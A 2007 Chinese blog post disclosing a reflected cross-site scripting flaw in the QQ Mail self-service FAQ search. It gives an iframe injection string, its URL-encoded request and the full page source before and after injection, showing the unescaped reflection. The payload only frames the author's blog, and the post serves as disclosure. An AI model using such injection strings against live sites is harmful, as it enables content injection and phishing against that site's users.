唯一谣|Airs|走尽天涯路|极地阳光

If you my only , I will give you my all.——无意义的音符能编成美妙的音乐,无规律的色彩可幻化为缤纷的世界 。我的空间:http://clin003.com/

原创 腾讯再爆跨站漏洞(QQ邮箱自助服务)(20070713)收藏

腾讯再爆跨站漏洞(QQ邮箱自助服务)(20070713)

by clin003 from:http://clin003.com/或http://blog.csdn.net/clin003/ at 200707130258

漏洞利用代码:直接在http://service.mail.qq.com/cgi-bin/faq页面搜索下面代码:

<iframe src="http://blog.csdn.net/clin003/" width="800" height="160" frameborder="0" ></iframe>
效果图:


导致跨站利用成功,抓包或分析源文件可得到利用代码:
by clin003 from:http://clin003.com/或http://blog.csdn.net/clin003/ at 200707130258
Referer: http://service.mail.qq.com/cgi-bin/faq?subtype=2&searchkey=%3Ciframe+src%3D%22http%3A%2F%2Fblog.csdn.net%2Fclin003%2F%22+width%3D%22800%22+height%3D%22160%22+frameborder%3D%220%22+%3E%3C%2Fiframe%3E

 by clin003 from:http://clin003.com/或http://blog.csdn.net/clin003/ at 200707130258

效果图:


连接:上一个跨站漏洞描述在:http://blog.csdn.net/clin003/archive/2007/07/10/1684442.aspx


漏洞前后的页面源码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>QQ邮箱自助服务</title>
<link rel="stylesheet" type="text/css" href="/css/default.css" />
<script type="text/javascript" src="/script/login.js"></script>
<script type="text/javascript">
    
var bAlwaysShowVerifyCode = false
    
var logintype=1;
    
var subtype=0;
    
function FirstPage(inputid,formid){
        document.getElementsByName(
'page')[inputid].value = -10;
        document.getElementById(formid).submit();
    }


    
function PrevPage(inputid,formid){
        
var p = document.getElementsByName('page')[inputid].value;
        p 
--;
        document.getElementsByName(
'page')[inputid].value = p;
        document.getElementById(formid).submit();
    }


    
function NextPage(inputid,formid){
        
var p = document.getElementsByName('page')[inputid].value;
        p 
++;
        document.getElementsByName(
'page')[inputid].value = p;
        document.getElementById(formid).submit();
    }


    
function EndPage(inputid,formid){
        document.getElementsByName(
'page')[inputid].value = -20;
        document.getElementById(formid).submit();
    }


    
function View(){
        
if (logintype==1)
        
{
            document.getElementById(
"dologin").style.display = "";

            document.getElementById(
"VerifyArea").style.display = ( bAlwaysShowVerifyCode ? "block" : "none" );

            window.onload 
= function() 
                document.getElementById(
"u").focus();
                init(); 
                CheckName(); 
            }

        }

        
else if (logintype==2)
        
{
            document.getElementById(
"dopage").style.display = "";
        }


        
if (subtype==0)
            document.getElementById(
"faqList").style.display = "";
        
else if (subtype==1)
            document.getElementById(
"faqListAll").style.display = "";
        
else if (subtype==2)
            document.getElementById(
"faqResult").style.display = "";
        
else if (subtype==3)
            document.getElementById(
"faqDetail").style.display = "";
    }


    
function CheckName(){
        
if(bAlwaysShowVerifyCode)return;
        
var re=/^d+$/;
        
if(re.test(document.form1.u.value)==true)
        
{
            document.getElementById(
"VerifyArea").style.display="block";
            document.form1.verifycode.enabled
=true;
        }

        
else
        
{
            document.getElementById(
"VerifyArea").style.display="none";
            document.form1.verifycode.enabled
=false;
        }

    }

</script>
</head>

<body id="page_home" class="home">
    
<div id="containerMain">

        
<div class="pageHead">
            
<div class="headerContainer">
                
<h1>QQ邮箱自助服务系统</h1>
                
<div class="logo">
                    
<href="/cgi-bin/loginpage" target="_top">
                        
<img src="/images/spacer.gif" alt="Logo" title="QQ邮箱自助服务系统"/>
                    
</a>
                
</div>
                
<hr />
                
<div class="pageOperation"></div>
            
</div>
            
<div style="clear:both;"></div>
            
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tabtitle">
            
<tr>
                
<td width="1" nowrap>&nbsp;</td>
                
<td width="90" align="center"><href="/cgi-bin/loginpage" title="">自助首页</a></td>
                
<td width="90" align="center"><href="/cgi-bin/help" title="">帮助中心</a></td>
                
<td width="90" align="center"  class="selected">常见问题</td>
                
<td width="90" align="center"><href="/cgi-bin/static_login" title="">登录查询</a></td>
                
<td width="90" align="center"><href="/cgi-bin/static_bonus" title="">积分查询</a></td>
                
<td width="90" align="center"><href="/cgi-bin/feedback" title="">自助反馈</a></td>
                
<td nowrap>&nbsp;</td>
            
</tr>
        
</table>
        
</div>

        
<div class="pageBody">

            
<div class="containerBodyLeft">

                
<div id="serviceTitle" class="box" >
                    
<dl id="serviceFaq">
                        
<dt class="title">常见问题</dt>
                        
<dd>QQ邮箱相关问题都可在此迅速找到答案。</dd>
                    
</dl>
                    
<form method="post" action="/cgi-bin/faq" style="margin:0 -74px 0 74px;padding:0 0 0 0;clear:both;" id="formSearch">
                        
<input type="hidden" name="subtype" value="2" style="margin-left:74px;" />
                        
<input name="searchkey" id="iptKey" type="text" class="input01" value="" size="53" onkeydown='if(event.keyCode==13) {document.getElementById("formSearch").submit();}' style="vertical-align:middle;margin-top:2px;"/>
                        
<input type="submit" class="searchButton" value=" 搜索 " style="vertical-align:middle;"
                        onclick
="if(document.getElementById('iptKey').value==''){alert('请填写要搜索的关键字');document.getElementById('iptKey').focus();return false;};"/>
                    
</form>
                
</div>
                
<div style="clear:both;"></div>

                
<div class="box">
                    
                    
<form method="post" action="/cgi-bin/faq" id="formResult">
                        
<input type="hidden" name="subtype" value="2" />

                        
<div class="searchResultList" id="faqResult" style="display:none">
                            
<input type="hidden" name="searchkey" value=""/>
                            
<input type="hidden" name="page" value=""/>
                            
<input type="hidden" name="kenbin" value="" />
                            
                            
<div class="count">
                                搜索到 
<b></b> 个与 "<b></b>" 相关的问题。
                            
</div>

                            
<div id="result" style="display:none;float:left;">
                                
<div class="operateBarContainer">
                                    
<div class="operateBarRight">
                                        第
&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;条问题
                                    
</div>
                                
</div>

                                
                                
<div class="operateBarContainer">
                                    
<div class="operateBarRight">
                                        第
&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;条问题
                                    
</div>
                                
</div>
                            
</div>
                            
<div style="clear:both;"></div>
                            
<script type="text/javaScript">
                                
if (document.getElementsByName('kenbin')[0].value != 0)
                                    document.getElementById(
"result").style.display = "";
                            
</script>
                        
</div>
                    
</form>

                    
<div class="contentDetail" id="faqDetail" style="display:none">
                        
<div class="returnTop">
                            
<href="">
                                
<img src="/images/icon_back.gif" align="absmiddle" />返回
                            
</a>
                        
</div>
                        
<div class="title"><span class="redfont">问:</span></div>
                        
<div class="content">
                            
<span class="bluefont">答:</span><font color="#555555"></font>
                        
</div>
                    
</div>
                    
<div style="clear:both;"></div>

                    
<div class="box" id="faqList" style="display:none">

                        
<div class="faqTopTen">
                            
<h3>最新问题</h3>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=220&&type=1&&ret=2">
                                在一个会话中,多个邮件是如...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=219&&type=1&&ret=2">
                                会话中包含了多封邮件,为什...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=218&&type=1&&ret=2">
                                什么是会话模式和分组模式?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=217&&type=1&&ret=2">
                                我可以修改日志的创建时间吗...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=216&&type=1&&ret=2">
                                怎么设置和取消待办日志呢?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=215&&type=1&&ret=2">
                                什么是待办日志?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=214&&type=1&&ret=2">
                                我的记事本日志可以分类吗?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=213&&type=1&&ret=2">
                                对方能收到并成功下载超大附...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=212&&type=1&&ret=2">
                                如何将文件中转站的文件发给...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=211&&type=1&&ret=2">
                                什么是提取码?
</a></li>
                            
</ul>
                        
</div>

                        
<div class="faqTopTen">
                            
<h3>热门问题</h3>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=193&&type=2&&ret=2">
                                教您识别欺诈邮件
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=181&&type=2&&ret=2">
                                为什么收取gmail邮件老是提...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=180&&type=2&&ret=2">
                                为什么我的163邮件不能收取...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=118&&type=2&&ret=2">
                                如何在首页显示我的QQ秀?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=117&&type=2&&ret=2">
                                我怎样使用QQ邮箱换肤功能呢...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=116&&type=2&&ret=2">
                                我怎么发QQ群邮件?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=115&&type=2&&ret=2">
                                我在哪里可以看到积分和等级...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=109&&type=2&&ret=2">
                                什么是QQ群邮件?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=107&&type=2&&ret=2">
                                QQ邮箱的等级如何划分呢?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=106&&type=2&&ret=2">
                                我如何获得积分?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=105&&type=2&&ret=2">
                                哪些人可以参加积分活动?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=205&&type=2&&ret=2">
                                为什么设置白名单后,仍然无...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=204&&type=2&&ret=2">
                                为什么设置白名单后,收到的...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=203&&type=2&&ret=2">
                                为什么常收不到邮件,白名单...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=202&&type=2&&ret=2">
                                我不喜欢“摘要”显示模式,...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=201&&type=2&&ret=2">
                                我是否能方便的将邮件内容转...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=200&&type=2&&ret=2">
                                我能将日志内容直接发给好友...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=199&&type=2&&ret=2">
                                我在写日志时,一定要写主题...
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=198&&type=2&&ret=2">
                                记事本支持全文搜索吗?
</a></li>
                            
</ul>
                            
<ul>
                                
<li><href="/cgi-bin/faq?subtype=3&&no=197&&type=2&&ret=2">
                                我的记事本总共有多大容量?
</a></li>
                            
</ul>
                        
</div>

                        
<div class="moreQuestion" style="margin:10px 0 0 0">
                            
<href="/cgi-bin/faq?subtype=1">
                                全部展开
                            
</a>
                        
</div>
                        
<div style="clear:both;"></div>
                    
</div>

                    
<div class="box" id="faqListAll" style="display:none">

                        
<form method="post" action="/cgi-bin/faq" id="formListAll">
                            
<input type="hidden" name="subtype" value="1" />
                            
<input type="hidden" name="page" value="" />

                            
<ul>
                            
</ul>

                            
<div class="operateBarRight">
                                第
&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;条问题
                            
</div>
                            
<div style="clear:both;"></div>
                        
</form>

                    
</div>
                    
<div style="clear:both;"></div>
                
</div>
                
<div style="clear:both;"></div>
            
</div>
        
</div>
        
<div class="containerBodyRight">
                
<div id="dologin" class="panelLogin" style="display:none">
                    
<h2>登录您的<span class="qq">QQ</span>邮箱自助服务</h2>
                    
<form name="form1" class="login" method="post" action="/cgi-bin/login" onSubmit="return checkInput();">
                        
<INPUT type=hidden name="templatename" value="faq"/>
                        
                        
<div>
                            
<label for="uin" class="column" >帐 号:</label>
                                
<input type="text" id="u" name="u" value="" tabindex="1" style="ime-mode: disabled;" class="text" />
                                
<span class="subfix">@qq.com</span>
                        
</div>
                        
<div>
                            
<label class="column" >密 码:</label>
                            
<input type="password" id="p" class="text" name="p" tabindex="2" onfocus="CheckName();" />
                        
</div>
                        
<div class="tip addrtitle">
                            请填写QQ密码。    
                        
</div>
                        
<span id="VerifyArea">
                            
<div >
                                
<label class="column">验证码:</label>
                                
<input id="vc" name="verifycode" type="text" tabindex="3" class="text" value="" style="ime-mode: disabled;" AUTOCOMPLETE="off" maxlength=4/>
                            
</div>
                            
<div class="tip">按下图字符填写</div>
                            
<div class="tip">
                                
<script type="text/javascript">
                                    document.write(
"<img id='vfcode' src='http://nverify.qq.com/getimage?", Math.random(), "' style='border:1px solid #e4eef9;width:130px; height:53px;'>");
                                
</script>
                            
</div>
                            
<div class="tip">
                                
<href="javascript:changeimg()">看不清楚?&nbsp;换一个</a>
                            
</div>
                        
</span>
                        
<div class="tip">
                            
<input type="submit" class="btn" style="font-weight:bold;" value="登 录" name="btlogin" tabindex="4"/><br/>
                        
</div>
                    
</form>
                
</div>
                
<div id="dopage" class="box hLogin" style="display:none">
                    
<h2>帐号信息</h2>
                    
<div class="personalInfo">
                        
<div class="msg">
                            
<div style="margin:0 0 10px 0;"><span>欢迎您,</span><span style="word-break:break-all;word-wrap: break-word;white-space:pre;font-weight:bold;margin:0 4px 0 0;"></span><span style="white-space:nowrap">[<href="/cgi-bin/logout?templatename=faq">退出</a>]</span></div>
                        
</div>
                        
<div class="info">
                            
<div style="margin:0 0 3px 0;float:left;"><span style="float:left;display:block;">邮箱帐号:&nbsp;</span><span style="float:left;display:block;width:58%;"></span></div>

                            
<div style="margin:0 0 3px 0;clear:both;">

                                积  分:
&nbsp;</div>

                            
<div style="margin:6px 0 3px 0;clear:both;line-height:16px;">
                                等  级:
                                
                            
</div>
                        
</div>
                    
</div>
                
</div>
                
<div class="box hLogin" style="text-align:center;margin:20px 0 20px 0;" ><href="http://survey.anti-spam.cn/8/" title="2007年第二次中国反垃圾邮件状况网络调查" target="_blank"><img src="/images/220-115.gif" alt="2007年第二次中国反垃圾邮件状况网络调查"/></a></div>
                
<div style="clear:both;"></div>
                

            
</div>

        
<hr />
        
<div class="pageFooter">
                
<div class="navPageBottom">
                    
<href="http://www.tencent.com/">关于腾讯</a>
                    
<href="http://www.tencent.com/index_e.shtml">About Tencent</a>
                    
<href="http://www.qq.com/contract.shtml">服务条款</a>
                    
<href="http://service.qq.com/" class="end">客服中心</a>
                
</div>
                
<class="copyright cLight">
                    
&copy; 1998 - 2007 Tencent Inc. All Rights Reserved&nbsp;&nbsp;
                
</p>

        
</div>
    
</div>
</body>
<script type="text/javaScript">View();</script>
</html>


-----------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>QQ邮箱自助服务</title>
<link rel="stylesheet" type="text/css" href="/css/default.css" />
<script type="text/javascript" src="/script/login.js"></script>
<script type="text/javascript">
    
var bAlwaysShowVerifyCode = false
    
var logintype=1;
    
var subtype=2;
    
function FirstPage(inputid,formid){
        document.getElementsByName(
'page')[inputid].value = -10;
        document.getElementById(formid).submit();
    }


    
function PrevPage(inputid,formid){
        
var p = document.getElementsByName('page')[inputid].value;
        p 
--;
        document.getElementsByName(
'page')[inputid].value = p;
        document.getElementById(formid).submit();
    }


    
function NextPage(inputid,formid){
        
var p = document.getElementsByName('page')[inputid].value;
        p 
++;
        document.getElementsByName(
'page')[inputid].value = p;
        document.getElementById(formid).submit();
    }


    
function EndPage(inputid,formid){
        document.getElementsByName(
'page')[inputid].value = -20;
        document.getElementById(formid).submit();
    }


    
function View(){
        
if (logintype==1)
        
{
            document.getElementById(
"dologin").style.display = "";

            document.getElementById(
"VerifyArea").style.display = ( bAlwaysShowVerifyCode ? "block" : "none" );

            window.onload 
= function() 
                document.getElementById(
"u").focus();
                init(); 
                CheckName(); 
            }

        }

        
else if (logintype==2)
        
{
            document.getElementById(
"dopage").style.display = "";
        }


        
if (subtype==0)
            document.getElementById(
"faqList").style.display = "";
        
else if (subtype==1)
            document.getElementById(
"faqListAll").style.display = "";
        
else if (subtype==2)
            document.getElementById(
"faqResult").style.display = "";
        
else if (subtype==3)
            document.getElementById(
"faqDetail").style.display = "";
    }


    
function CheckName(){
        
if(bAlwaysShowVerifyCode)return;
        
var re=/^d+$/;
        
if(re.test(document.form1.u.value)==true)
        
{
            document.getElementById(
"VerifyArea").style.display="block";
            document.form1.verifycode.enabled
=true;
        }

        
else
        
{
            document.getElementById(
"VerifyArea").style.display="none";
            document.form1.verifycode.enabled
=false;
        }

    }

</script>
</head>

<body id="page_home" class="home">
    
<div id="containerMain">

        
<div class="pageHead">
            
<div class="headerContainer">
                
<h1>QQ邮箱自助服务系统</h1>
                
<div class="logo">
                    
<href="/cgi-bin/loginpage" target="_top">
                        
<img src="/images/spacer.gif" alt="Logo" title="QQ邮箱自助服务系统"/>
                    
</a>
                
</div>
                
<hr />
                
<div class="pageOperation"></div>
            
</div>
            
<div style="clear:both;"></div>
            
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="tabtitle">
            
<tr>
                
<td width="1" nowrap>&nbsp;</td>
                
<td width="90" align="center"><href="/cgi-bin/loginpage" title="">自助首页</a></td>
                
<td width="90" align="center"><href="/cgi-bin/help" title="">帮助中心</a></td>
                
<td width="90" align="center"  class="selected">常见问题</td>
                
<td width="90" align="center"><href="/cgi-bin/static_login" title="">登录查询</a></td>
                
<td width="90" align="center"><href="/cgi-bin/static_bonus" title="">积分查询</a></td>
                
<td width="90" align="center"><href="/cgi-bin/feedback" title="">自助反馈</a></td>
                
<td nowrap>&nbsp;</td>
            
</tr>
        
</table>
        
</div>

        
<div class="pageBody">

            
<div class="containerBodyLeft">

                
<div id="serviceTitle" class="box" >
                    
<dl id="serviceFaq">
                        
<dt class="title">常见问题</dt>
                        
<dd>QQ邮箱相关问题都可在此迅速找到答案。</dd>
                    
</dl>
                    
<form method="post" action="/cgi-bin/faq" style="margin:0 -74px 0 74px;padding:0 0 0 0;clear:both;" id="formSearch">
                        
<input type="hidden" name="subtype" value="2" style="margin-left:74px;" />
                        
<input name="searchkey" id="iptKey" type="text" class="input01" value="<iframe src="http://blog.csdn.net/clin003/" width="800" height="160" frameborder="0" ></iframe>" size="53" onkeydown='if(event.keyCode==13) {document.getElementById("formSearch").submit();}' style="vertical-align:middle;margin-top:2px;"/>
                        
<input type="submit" class="searchButton" value=" 搜索 " style="vertical-align:middle;"
                        onclick
="if(document.getElementById('iptKey').value==''){alert('请填写要搜索的关键字');document.getElementById('iptKey').focus();return false;};"/>
                    
</form>
                
</div>
                
<div style="clear:both;"></div>

                
<div class="box">
                    
                    
<form method="post" action="/cgi-bin/faq" id="formResult">
                        
<input type="hidden" name="subtype" value="2" />

                        
<div class="searchResultList" id="faqResult" style="display:none">
                            
<input type="hidden" name="searchkey" value="<iframe src="http://blog.csdn.net/clin003/" width="800" height="160" frameborder="0" ></iframe>"/>
                            
<input type="hidden" name="page" value="1"/>
                            
<input type="hidden" name="kenbin" value="0" />
                            
                            
<div class="count">
                                搜索到 
<b>0</b> 个与 "<b><iframe src="http://blog.csdn.net/clin003/" width="800" height="160" frameborder="0" ></iframe></b>" 相关的问题。
                            
</div>

                            
<div id="result" style="display:none;float:left;">
                                
<div class="operateBarContainer">
                                    
<div class="operateBarRight">
                                        第
&nbsp;1-0&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;条问题
                                    
</div>
                                
</div>

                                
                                
<div class="operateBarContainer">
                                    
<div class="operateBarRight">
                                        第
&nbsp;1-0&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;条问题
                                    
</div>
                                
</div>
                            
</div>
                            
<div style="clear:both;"></div>
                            
<script type="text/javaScript">
                                
if (document.getElementsByName('kenbin')[0].value != 0)
                                    document.getElementById(
"result").style.display = "";
                            
</script>
                        
</div>
                    
</form>

                    
<div class="contentDetail" id="faqDetail" style="display:none">
                        
<div class="returnTop">
                            
<href="">
                                
<img src="/images/icon_back.gif" align="absmiddle" />返回
                            
</a>
                        
</div>
                        
<div class="title"><span class="redfont">问:</span></div>
                        
<div class="content">
                            
<span class="bluefont">答:</span><font color="#555555"></font>
                        
</div>
                    
</div>
                    
<div style="clear:both;"></div>

                    
<div class="box" id="faqList" style="display:none">

                        
<div class="faqTopTen">
                            
<h3>最新问题</h3>
                        
</div>

                        
<div class="faqTopTen">
                            
<h3>热门问题</h3>
                        
</div>

                        
<div class="moreQuestion" style="margin:10px 0 0 0">
                            
<href="/cgi-bin/faq?subtype=1">
                                全部展开
                            
</a>
                        
</div>
                        
<div style="clear:both;"></div>
                    
</div>

                    
<div class="box" id="faqListAll" style="display:none">

                        
<form method="post" action="/cgi-bin/faq" id="formListAll">
                            
<input type="hidden" name="subtype" value="1" />
                            
<input type="hidden" name="page" value="1" />

                            
<ul>
                            
</ul>

                            
<div class="operateBarRight">
                                第
&nbsp;1-0&nbsp;&nbsp;&nbsp;&nbsp;0&nbsp;条问题
                            
</div>
                            
<div style="clear:both;"></div>
                        
</form>

                    
</div>
                    
<div style="clear:both;"></div>
                
</div>
                
<div style="clear:both;"></div>
            
</div>
        
</div>
        
<div class="containerBodyRight">
                
<div id="dologin" class="panelLogin" style="display:none">
                    
<h2>登录您的<span class="qq">QQ</span>邮箱自助服务</h2>
                    
<form name="form1" class="login" method="post" action="/cgi-bin/login" onSubmit="return checkInput();">
                        
<INPUT type=hidden name="templatename" value="faq"/>
                        
                        
<div>
                            
<label for="uin" class="column" >帐 号:</label>
                                
<input type="text" id="u" name="u" value="" tabindex="1" style="ime-mode: disabled;" class="text" />
                                
<span class="subfix">@qq.com</span>
                        
</div>
                        
<div>
                            
<label class="column" >密 码:</label>
                            
<input type="password" id="p" class="text" name="p" tabindex="2" onfocus="CheckName();" />
                        
</div>
                        
<div class="tip addrtitle">
                            请填写QQ密码。    
                        
</div>
                        
<span id="VerifyArea">
                            
<div >
                                
<label class="column">验证码:</label>
                                
<input id="vc" name="verifycode" type="text" tabindex="3" class="text" value="" style="ime-mode: disabled;" AUTOCOMPLETE="off" maxlength=4/>
                            
</div>
                            
<div class="tip">按下图字符填写</div>
                            
<div class="tip">
                                
<script type="text/javascript">
                                    document.write(
"<img id='vfcode' src='http://nverify.qq.com/getimage?", Math.random(), "' style='border:1px solid #e4eef9;width:130px; height:53px;'>");
                                
</script>
                            
</div>
                            
<div class="tip">
                                
<href="javascript:changeimg()">看不清楚?&nbsp;换一个</a>
                            
</div>
                        
</span>
                        
<div class="tip">
                            
<input type="submit" class="btn" style="font-weight:bold;" value="登 录" name="btlogin" tabindex="4"/><br/>
                        
</div>
                    
</form>
                
</div>
                
<div id="dopage" class="box hLogin" style="display:none">
                    
<h2>帐号信息</h2>
                    
<div class="personalInfo">
                        
<div class="msg">
                            
<div style="margin:0 0 10px 0;"><span>欢迎您,</span><span style="word-break:break-all;word-wrap: break-word;white-space:pre;font-weight:bold;margin:0 4px 0 0;"></span><span style="white-space:nowrap">[<href="/cgi-bin/logout?templatename=faq">退出</a>]</span></div>
                        
</div>
                        
<div class="info">
                            
<div style="margin:0 0 3px 0;float:left;"><span style="float:left;display:block;">邮箱帐号:&nbsp;</span><span style="float:left;display:block;width:58%;"></span></div>

                            
<div style="margin:0 0 3px 0;clear:both;">

                                积  分:
&nbsp;</div>

                            
<div style="margin:6px 0 3px 0;clear:both;line-height:16px;">
                                等  级:
                                
                            
</div>
                        
</div>
                    
</div>
                
</div>
                
<div class="box hLogin" style="text-align:center;margin:20px 0 20px 0;" ><href="http://survey.anti-spam.cn/8/" title="2007年第二次中国反垃圾邮件状况网络调查" target="_blank"><img src="/images/220-115.gif" alt="2007年第二次中国反垃圾邮件状况网络调查"/></a></div>
                
<div style="clear:both;"></div>
                

            
</div>

        
<hr />
        
<div class="pageFooter">
                
<div class="navPageBottom">
                    
<href="http://www.tencent.com/">关于腾讯</a>
                    
<href="http://www.tencent.com/index_e.shtml">About Tencent</a>
                    
<href="http://www.qq.com/contract.shtml">服务条款</a>
                    
<href="http://service.qq.com/" class="end">客服中心</a>
                
</div>
                
<class="copyright cLight">
                    
&copy; 1998 - 2007 Tencent Inc. All Rights Reserved&nbsp;&nbsp;
                
</p>

        
</div>
    
</div>
</body>
<script type="text/javaScript">View();</script>
</html>

发表于 @ 2007年07月13日 03:06:00|评论(loading...)

新一篇: 站被黑啦 | 旧一篇: 腾讯客服中心跨站漏洞(20070710)

用户操作
[即时聊天] [发私信] [加为好友]
走尽天涯路
订阅我的博客
XML聚合  FeedSky
走尽天涯路的公告

专门为您定制的Google搜索引擎
___________________
留言吗,点这里留

----------------------- =================
-------------------

文章分类
收藏
······
Lin's Spaces|Only !(RSS)
What would you like to Metasploit today?(RSS)
我的爬行JI
洛阳生活信息点评网
C/C++
Bjarne Stroustrup's homepage
c/c++书籍,网页,文档,资料
C++的罗浮宫(RSS)
c++网络资源
C++资源之不完全导引
Open Source software
The Code Project
Tongji Online Judge
csdn(Blog)朋友
junjun的世界 (XJSOFT)
极地银狐blog
Linux
CentOs Pub
搜索引擎||搜索
Dict(Directory OL)(RSS)
Nutch
Windows Resource Kits - Web Resources(RSS)
WorldLingo
搜毒
源代码搜索-Koders.com
我的其他链接
clingame迅雷博客(RSS)
My老师
网络安全维客
黑客百科
我的相册()
走尽天涯路
存档
Csdn Blog version 3.1a
Copyright © 走尽天涯路